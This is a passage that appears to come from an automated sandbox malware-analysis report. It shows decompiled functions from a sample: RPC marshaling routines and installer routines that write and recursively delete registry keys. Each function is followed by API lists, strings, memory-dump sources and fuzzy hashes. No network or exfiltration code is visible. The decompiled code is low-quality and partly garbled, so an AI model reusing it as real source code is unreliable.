                                                                                                						_v12 = _v8[2] & 0x0000ffff;
                                                                                                						_a12 =  &(_v8[4]);
                                                                                                					}
                                                                                                					if((_a16 & 0x000000ff) == 0) {
                                                                                                						if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                                							 *_a8 =  *((intOrPtr*)(_a4 + 4));
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t81 = E6EDAA3B0(_a4, _a4, _v12);
                                                                                                						_t126 = _t126 + 8;
                                                                                                						 *_a8 = _t81;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                					_v16 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                                					E6EDAAF00(_a4, _v12);
                                                                                                					_a12 = E6EDAC2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                                					0x6eda0000("copying %p to %p\n", _v16,  *_a8);
                                                                                                					if( *_a8 != _v16) {
                                                                                                						E6EDB0120( *_a8, _v16, _v12);
                                                                                                					}
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}












                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x
                                                                                                • API String ID: 4056999889-4001265739
                                                                                                • Opcode ID: 91a79de413fc3eb8095d54703ce57511440e9cb1779499d2b9f9c8537a9ddd99
                                                                                                • Instruction ID: 78b2e277ae1306cd01a1fb775808e5572d3517a2b1dc4c0a7b5c1970b6805546
                                                                                                • Opcode Fuzzy Hash: 91a79de413fc3eb8095d54703ce57511440e9cb1779499d2b9f9c8537a9ddd99
                                                                                                • Instruction Fuzzy Hash: 9A5153B5A04149EFCB44CF98C8909AEBBB6AF49304F10C599F9599B345E730EB50CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA1DE3
                                                                                                Strings
                                                                                                • string=%s, xrefs: 6EDA1D39
                                                                                                • (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p), xrefs: 6EDA1CD2
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA1DD1
                                                                                                • string=%s, xrefs: 6EDA1DA8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p)$Unhandled string type: %#x$string=%s$string=%s
                                                                                                • API String ID: 3997070919-3787768504
                                                                                                • Opcode ID: f93a8c38a6bf33348470d04dec32b58834743f4f6005a941194b6555f8f59a96
                                                                                                • Instruction ID: 057f481ce277bbec3bcbbb4bcedf1c922b039f1e11b6426339cab451c32f5d7a
                                                                                                • Opcode Fuzzy Hash: f93a8c38a6bf33348470d04dec32b58834743f4f6005a941194b6555f8f59a96
                                                                                                • Instruction Fuzzy Hash: 1E4162B5E00109EFCB04CFD8D881AAEBBB6BF85305F148448EA559B341E731DB55CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAA9B0: RpcRaiseException.RPCRT4(000006F7,6EDACF82,00000000), ref: 6EDAA9DA
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA59BF
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p), xrefs: 6EDA58A2
                                                                                                • string=%s, xrefs: 6EDA5915
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA59AD
                                                                                                • string=%s, xrefs: 6EDA5984
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p)$Unhandled string type: %#x$string=%s$string=%s
                                                                                                • API String ID: 3997070919-3787768504
                                                                                                • Opcode ID: 254244805384c8716a7e408d8d5df78a83957e7c13cad2e9879590bbdd5d1149
                                                                                                • Instruction ID: f36af447eae9745a415f223902d05b3afa64e2dd38ee8f287d21a0ddf490e6d2
                                                                                                • Opcode Fuzzy Hash: 254244805384c8716a7e408d8d5df78a83957e7c13cad2e9879590bbdd5d1149
                                                                                                • Instruction Fuzzy Hash: 84416EB5E00109EFCB04CFD8D890AAEBBB9BF85305F108548EA559B341E731EB51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA7EF6
                                                                                                  • Part of subcall function 6EDAAF00: RpcRaiseException.RPCRT4(000006F7,?,6EDA108D,?,00000004), ref: 6EDAAF34
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA7F65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Allocate$ExceptionRaise
                                                                                                • String ID: *ppMemory: %p$*ppMemory: %p$value: 0x%08lx
                                                                                                • API String ID: 3846748424-1131284453
                                                                                                • Opcode ID: b696f77a738ad791a7024d0e991b4e846dd80cfc6f6ab7f1f3bc6e3a48e5007e
                                                                                                • Instruction ID: 511c85775525265586a38d3089649c7da39d66b4a37b530038666dae2315f22f
                                                                                                • Opcode Fuzzy Hash: b696f77a738ad791a7024d0e991b4e846dd80cfc6f6ab7f1f3bc6e3a48e5007e
                                                                                                • Instruction Fuzzy Hash: E94171B4604205EFDB00CFA8D840BA93765AF85719F10C558FE199F388E731EB50CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA7DD1
                                                                                                  • Part of subcall function 6EDAAF00: RpcRaiseException.RPCRT4(000006F7,?,6EDA108D,?,00000004), ref: 6EDAAF34
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA7E40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Allocate$ExceptionRaise
                                                                                                • String ID: *ppMemory: %p$*ppMemory: %p$value: 0x%08lx
                                                                                                • API String ID: 3846748424-1131284453
                                                                                                • Opcode ID: c9984271f20bcaadfc6a9c12a69530ebefa05e4554e57eb67a0d5dfa2efe4f83
                                                                                                • Instruction ID: 57107f4c461a964d05b55780cf5996513fefc4572efd6dac7d38edf471f3ec2c
                                                                                                • Opcode Fuzzy Hash: c9984271f20bcaadfc6a9c12a69530ebefa05e4554e57eb67a0d5dfa2efe4f83
                                                                                                • Instruction Fuzzy Hash: 454162B4A04205EFDB04CFA8D850BAA776AAF45319F04C558FE598F389E731DB40CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 28%
                                                                                                			E6EDA41B0(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				void* _t70;
                                                                                                				void* _t98;
                                                                                                				void* _t99;
                                                                                                
                                                                                                				_v12 = 0;
                                                                                                				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				if(( *_a12 & 0x000000ff) == 0x21) {
                                                                                                					_v16 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                                					_v8 =  *((intOrPtr*)(_a4 + 4));
                                                                                                					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                                					 *((intOrPtr*)(_a4 + 0x18)) = 0;
                                                                                                					E6EDA6490(_a4, _a12);
                                                                                                					 *((intOrPtr*)(_a4 + 0x30)) = _v16;
                                                                                                					0x6eda0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 4)) - _v8);
                                                                                                					if( *((intOrPtr*)(_a4 + 0x34)) == 0) {
                                                                                                						 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                						_v12 = 1;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_a4 + 4)) = _v8;
                                                                                                					E6EDAD650(0x21, _a4, _a12);
                                                                                                					E6EDAD830(_t70, _t98, _t99, 0x21, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
                                                                                                					if(_v12 != 0) {
                                                                                                						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                                						 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                                					}
                                                                                                					return 0;
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return 0;
                                                                                                			}










                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA4211
                                                                                                • _NdrComplexArrayMemorySize@8.SOZZ(?,?), ref: 6EDA424C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ArrayComplexExceptionMemoryRaiseSize@8
                                                                                                • String ID: (%p,%p,%p,%d)$difference = 0x%x$invalid format type %x
                                                                                                • API String ID: 3734139831-2050479018
                                                                                                • Opcode ID: 1b3b93d76e6053dda3499361e3d9cc45d77ab00d8b20b20ad022f93ff931c25d
                                                                                                • Instruction ID: 6868bf690cab6fdc996e4288eef1d744fb4efec9fb6c2605e54cbcd62c2285d7
                                                                                                • Opcode Fuzzy Hash: 1b3b93d76e6053dda3499361e3d9cc45d77ab00d8b20b20ad022f93ff931c25d
                                                                                                • Instruction Fuzzy Hash: 41410EB5600208AFDB44CF98C990B9A7BB6AF88344F14C158FD498B385D771EA91CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6FC5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$conformance = %ld$invalid format type %x$variance = %d
                                                                                                • API String ID: 3997070919-1898606334
                                                                                                • Opcode ID: 41c41b085873cab84509345c1e8070ad612cd23c86ac5cc8473d5571e51a431e
                                                                                                • Instruction ID: c483dbdeb12111feef4301ac8c71042c0c0623170e3beca34bbcc816b4ac6f86
                                                                                                • Opcode Fuzzy Hash: 41c41b085873cab84509345c1e8070ad612cd23c86ac5cc8473d5571e51a431e
                                                                                                • Instruction Fuzzy Hash: ED3110B5A00109AFDB04DF98D890EAE77B9BB48344F00C558FA198B345E731EA51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 30%
                                                                                                			E6EDA6600(intOrPtr _a4, signed char* _a8) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				signed int _v20;
                                                                                                				void* _t73;
                                                                                                				void* _t75;
                                                                                                
                                                                                                				0x6eda0000("(pStubMsg == ^%p, pFormat == ^%p)\n", _a4, _a8);
                                                                                                				_v12 =  *(_a8 + (1 << 1)) & 0x0000ffff;
                                                                                                				E6EDAA540( *(_a8 + (1 << 1)) & 0x0000ffff, _a4, 0, _v12);
                                                                                                				_t75 = _t73 + 0x18;
                                                                                                				if( *((intOrPtr*)(_a4 + 0x40)) != 0) {
                                                                                                					0x6eda0000("non-conformant strings can\'t have Offset (%d)\n",  *((intOrPtr*)(_a4 + 0x40)));
                                                                                                					_t75 = _t75 + 8;
                                                                                                					__imp__RpcRaiseException(0x6c6);
                                                                                                				}
                                                                                                				if(( *_a8 & 0x000000ff) != 0x26) {
                                                                                                					if(( *_a8 & 0x000000ff) != 0x29) {
                                                                                                						0x6eda0000("Unhandled string type: %#x\n",  *_a8 & 0x000000ff);
                                                                                                						_t75 = _t75 + 8;
                                                                                                						__imp__RpcRaiseException(0x6f7);
                                                                                                					} else {
                                                                                                						_v8 = 2;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_v8 = 1;
                                                                                                				}
                                                                                                				_v20 = _v8 * _v12;
                                                                                                				_v16 = E6EDAAEC0(_v8,  *((intOrPtr*)(_a4 + 0x44)));
                                                                                                				E6EDAB0C0(_a4, _a4, _v16, _v8);
                                                                                                				E6EDAAF00(_a4, _v16);
                                                                                                				 *((intOrPtr*)(_a4 + 0x18)) =  *((intOrPtr*)(_a4 + 0x18)) + _v20;
                                                                                                				return  *((intOrPtr*)(_a4 + 0x18));
                                                                                                			}










                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA6660
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA66A7
                                                                                                Strings
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA6695
                                                                                                • (pStubMsg == ^%p, pFormat == ^%p), xrefs: 6EDA660E
                                                                                                • non-conformant strings can't have Offset (%d), xrefs: 6EDA664E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pFormat == ^%p)$Unhandled string type: %#x$non-conformant strings can't have Offset (%d)
                                                                                                • API String ID: 3997070919-3730632230
                                                                                                • Opcode ID: a5dae440ecf49078ef8489c5b90378dfcee0ad9607f20499e0027705d4318d7b
                                                                                                • Instruction ID: 0e9965502e440e68a26e1106838e6fa2f4f3742fa5fa5a69662d4ff3ef231929
                                                                                                • Opcode Fuzzy Hash: a5dae440ecf49078ef8489c5b90378dfcee0ad9607f20499e0027705d4318d7b
                                                                                                • Instruction Fuzzy Hash: 95312FB5A00108EFCB04DF98D8909AD7B79EF99344F108199FA594B345E731EB51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E004022F5(void* __eax) {
                                                                                                				void* _t15;
                                                                                                				char* _t18;
                                                                                                				int _t19;
                                                                                                				char _t24;
                                                                                                				int _t27;
                                                                                                				signed int _t30;
                                                                                                				intOrPtr _t35;
                                                                                                				void* _t37;
                                                                                                
                                                                                                				_t15 = E00402ADD(__eax);
                                                                                                				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                                                                                				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                                                                                				 *(_t37 - 0x44) = E004029E8(2);
                                                                                                				_t18 = E004029E8(0x11);
                                                                                                				_t30 =  *0x42ec10; // 0x0
                                                                                                				 *(_t37 - 4) = 1;
                                                                                                				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                                                                                				if(_t19 == 0) {
                                                                                                					if(_t35 == 1) {
                                                                                                						E004029E8(0x23);
                                                                                                						_t19 = lstrlenA(0x40a378) + 1;
                                                                                                					}
                                                                                                					if(_t35 == 4) {
                                                                                                						_t24 = E004029CB(3);
                                                                                                						 *0x40a378 = _t24;
                                                                                                						_t19 = _t35;
                                                                                                					}
                                                                                                					if(_t35 == 3) {
                                                                                                						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
                                                                                                					}
                                                                                                					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
                                                                                                						 *(_t37 - 4) = _t27;
                                                                                                					}
                                                                                                					_push( *(_t37 + 8));
                                                                                                					RegCloseKey();
                                                                                                				}
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
                                                                                                				return 0;
                                                                                                			}












                                                                                                APIs
                                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nszE2AE.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nszE2AE.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nszE2AE.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nszE2AE.tmp
                                                                                                • API String ID: 1356686001-927828151
                                                                                                • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                                                                • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                                                                                • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                                                                • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E00402A28(void* _a4, char* _a8, long _a12) {
                                                                                                				void* _v8;
                                                                                                				char _v272;
                                                                                                				signed char _t16;
                                                                                                				long _t18;
                                                                                                				long _t25;
                                                                                                				intOrPtr* _t27;
                                                                                                				long _t28;
                                                                                                
                                                                                                				_t16 =  *0x42ec10; // 0x0
                                                                                                				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                                                                                				if(_t18 == 0) {
                                                                                                					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                                						__eflags = _a12;
                                                                                                						if(_a12 != 0) {
                                                                                                							RegCloseKey(_v8);
                                                                                                							L8:
                                                                                                							__eflags = 1;
                                                                                                							return 1;
                                                                                                						}
                                                                                                						_t25 = E00402A28(_v8,  &_v272, 0);
                                                                                                						__eflags = _t25;
                                                                                                						if(_t25 != 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                					}
                                                                                                					RegCloseKey(_v8);
                                                                                                					_t27 = E00405C49(2);
                                                                                                					if(_t27 == 0) {
                                                                                                						__eflags =  *0x42ec10; // 0x0
                                                                                                						if(__eflags != 0) {
                                                                                                							goto L8;
                                                                                                						}
                                                                                                						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                                						__eflags = _t28;
                                                                                                						if(_t28 != 0) {
                                                                                                							goto L8;
                                                                                                						}
                                                                                                						return _t28;
                                                                                                					}
                                                                                                					return  *_t27(_a4, _a8,  *0x42ec10, 0);
                                                                                                				}
                                                                                                				return _t18;
                                                                                                			}











                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                                                                • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                                                                                • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                                                                • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00401CC1(int __edx) {
                                                                                                				void* _t17;
                                                                                                				struct HINSTANCE__* _t21;
                                                                                                				struct HWND__* _t25;
                                                                                                				void* _t27;
                                                                                                
                                                                                                				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                                                                                				GetClientRect(_t25, _t27 - 0x40);
                                                                                                				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                                                				if(_t17 != _t21) {
                                                                                                					DeleteObject(_t17);
                                                                                                				}
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
                                                                                                				return 0;
                                                                                                			}








                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 00401CC5
                                                                                                • GetClientRect.USER32 ref: 00401CD2
                                                                                                • LoadImageA.USER32 ref: 00401CF3
                                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                                                                • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                                                                                • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                                                                • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E6EDA3AA0(signed int _a4, intOrPtr* _a8, signed short* _a12, signed int _a16) {
                                                                                                				signed char* _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				signed char* _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				char _v40;
                                                                                                				signed int _v44;
